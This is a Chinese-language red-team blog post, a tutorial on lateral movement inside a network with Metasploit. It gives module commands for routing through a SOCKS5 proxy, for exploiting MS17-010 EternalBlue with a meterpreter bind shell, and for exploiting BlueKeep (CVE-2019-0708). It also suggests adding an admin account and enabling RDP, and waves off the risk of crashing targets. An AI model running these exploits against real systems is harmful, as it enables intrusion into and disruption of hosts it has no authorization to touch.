大家好,这里是 渗透攻击红队 的第 59 篇文章,本公众号会记录一些红队攻击的案例,不定时更新
对于 Metasploit 各方面的使用我之前也发过文章,大家去翻我公众号之前的文章就能找到;本篇主要讲基于 Metasploit 如何快速在内网拿到其他跳板机,虽然很粗暴但百试不爽。
基于 Msf 如何快速拿到内网其他跳板机器
前言
针对于使用 MSF 对内网进行扫描,常见的就是使用 proxychains(socks5) msfconsole 就能直接对内网进行扫描, 但其实 proxychains 还是有很多问题的,不太稳定... 为了延缓这一缺点,MSF 有一个参数可以弥补这一缺点:
代码语言:javascript复制msf6 > setg Proxies socks5:你的socksIP:端口MSF 只需要设置这一条参数就可以接入 Socks5 隧道!
之后为了梳理扫描到的漏洞资产或者其他,我们需要把 MSF 连接到数据库:
代码语言:javascript复制msf6 > db_connect postgres:hacker@127.0.0.1/msfdb
Connected to Postgres data service: 127.0.0.1/msfdb
设置好之后,以后通过 MSF 扫描到的资产或者漏洞都可以保存到数据库,方便我们梳理,我常用的就是这两个语句:
代码语言:javascript复制msf6 > services 查看扫描到的资产IP及端口
msf6 > vulns 查看扫描到的漏洞资产
MS17-010(永恒之蓝)
在内网渗透过程中如果想要快速拿到一台跳板机器,首选 MS17-010 来打,当然还需要针对与不同的操作系统位数来选择不同的利用模块打;如果目标操作系统是 Win7x64、2008x64 的,可以直接使用正向代理 exploit 利用模块打过去:
代码语言:javascript复制msf6> use exploit/windows/smb/ms17_010_eternalblue
msf6> set payload windows/x64/meterpreter/bind_tcp
msf6> run
要是目标系统是 2003x32、Win7x32 的只能使用这个模块去执行命令:
代码语言:javascript复制msf6> use auxiliary/admin/smb/ms17_010_command
msf6> set command whoami
msf6> run
思路就是添加一个超级管理员权限的用户,开启它远程桌面服务:
CVE-2019-0708-远程代码执行
除了永恒之蓝还有 0708 可以快速获取到目标主机权限(前提目标开启了 3389,未打补丁),实际情况下很多单位都只打了永恒之蓝的补丁,对于 0708 的补丁还没打,所以很多情况下还是可以利用的!针对于0708 可以使用这个模块打:
代码语言:javascript复制msf6> use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf6> run
结尾
以上关于 MS17-010、CVE-2019-0708 这两个漏洞虽然能够快速获取到内网主机权限,相对于其他漏洞来说还是动静太大,永恒之蓝还好,0708 一般来说要打很多次,其中目标主机还会关机蓝屏,所以如果 xdm 不考虑后果的情况下是可以使用这两个漏洞快速去横向渗透,如果害怕动静大的话,这两个漏洞只能是缓兵之计,没有办法了再去用!
